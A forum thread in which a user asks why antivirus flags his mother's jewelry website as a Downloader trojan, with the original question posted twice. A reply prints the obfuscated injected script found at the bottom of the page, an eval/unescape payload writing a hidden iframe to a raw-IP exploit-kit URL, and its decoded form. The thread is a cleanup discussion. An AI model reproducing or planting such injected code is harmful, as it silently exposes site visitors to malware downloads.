The new forums will be named Coin Return (based on the most recent vote)! You can check on the status and timeline of the transition to the new forums here.
The Guiding Principles and New Rules document is now in effect.
Website I made is infected with Downloader trojan?
TychoCelchuuu
PIGEONRegistered User regular
PIGEONRegistered User regular
So a few years back I (very sloppily) made a website for my mom's jewelry business (ronnaround.com, but don't visit just yet). Recently, like yesterday, people have started telling her that when they go to her website, Norton Anti-virus blocks "Downloader" which according to the Norton website is an old trojan that tries to download crap.
So that's great. I manage the website through ipower's control panel, which is powered by "vDeck." I can see a directory tree of every file on the website and I don't see anything that looks like a trojan. I don't see how a trojan could have gotten on to the website, because I thought I was the only one allowed to upload stuff to it.
There are some folders that I did not put there and that have not been there since day 1, but they look like they're official vDeck stuff. One is named "cgi-bin" and it has an empty folder inside named "tmp," one is named "formbuilder" which has a folder named "web" which has one named "forms" which has a small .html file that basically says "thank you for filling out the form" named "thanks.html." Finally there's a folder named "v-web" that has a folder named "images" which is empty and a folder named "errdocs" which has various html pages that are 40X errors with the vDeck logo.
I am reluctant to delete these folders since they might be some sort of vDeck thing, and in any case I don't see how there's a trojan hiding in them. On the other hand I know just about nothing about the distribution side of viruses so there's that. Can it be piggybacking on some .html file or image file I uploaded? Could it have been implanted there without my knowledge one day by a robot/hacker or something? How do I get rid of it? Is there even a virus on the page?
So that's great. I manage the website through ipower's control panel, which is powered by "vDeck." I can see a directory tree of every file on the website and I don't see anything that looks like a trojan. I don't see how a trojan could have gotten on to the website, because I thought I was the only one allowed to upload stuff to it.
There are some folders that I did not put there and that have not been there since day 1, but they look like they're official vDeck stuff. One is named "cgi-bin" and it has an empty folder inside named "tmp," one is named "formbuilder" which has a folder named "web" which has one named "forms" which has a small .html file that basically says "thank you for filling out the form" named "thanks.html." Finally there's a folder named "v-web" that has a folder named "images" which is empty and a folder named "errdocs" which has various html pages that are 40X errors with the vDeck logo.
I am reluctant to delete these folders since they might be some sort of vDeck thing, and in any case I don't see how there's a trojan hiding in them. On the other hand I know just about nothing about the distribution side of viruses so there's that. Can it be piggybacking on some .html file or image file I uploaded? Could it have been implanted there without my knowledge one day by a robot/hacker or something? How do I get rid of it? Is there even a virus on the page?
TychoCelchuuu on
0
Posts
Call them up, and request a tech, be prepared to have a two hour phone call depending on how their support flow is going. Have the tech log into the server itself and search for hidden files and help you find the potential problem.
Are any other internet viewers with popup block or any other antivirus programs seeing this as well, or just norton? If it's just norton, it could be an error somewhere in your code for the site causing the problem. Do you have flash graphics, or a link to adobe flash player? That downloader could be causing the problem.
I'll call Ipower when I get a chance. Thanks for the help.
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%33%34%30%61%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%33%38%34%30%29%2b%27%31%31%61%5c%27%20%77%69%64%74%68%3d%35%39%34%20%68%65%69%67%68%74%3d%33%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>This is at the bottom of your page.
This translates into:
window.status='Done';document.write('<iframe name=1340a5 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*213840)+'11a\' width=594 height=360 style=\'display: none\'></iframe>'The question now is, how did it get there? I checked the copy of it that I have on my computer, and the code is there, but I recently downloaded it from the copy online so my guess is that it snuck there not from my computer but from somewhere else. I purged the offending code and reuploaded it, and the bad stuff has not reappared (in the first 15 seconds at least). So I'll keep an eye out for it, and this is good because the problem is sort of solved, but if anyone knows anything about how this stuff happens I'm curious.
edit: also, the CSS points to a local file on K:.
Glad to hear it's not reappearing. It was most likely a one time event, but do as everyone else suggests and create a strong password with many case variants, symbols, letters, and numbers. Most likely this was some sort of vDeck vulnerability.
Edit:
Linux is great for troubleshooting these things sometimes.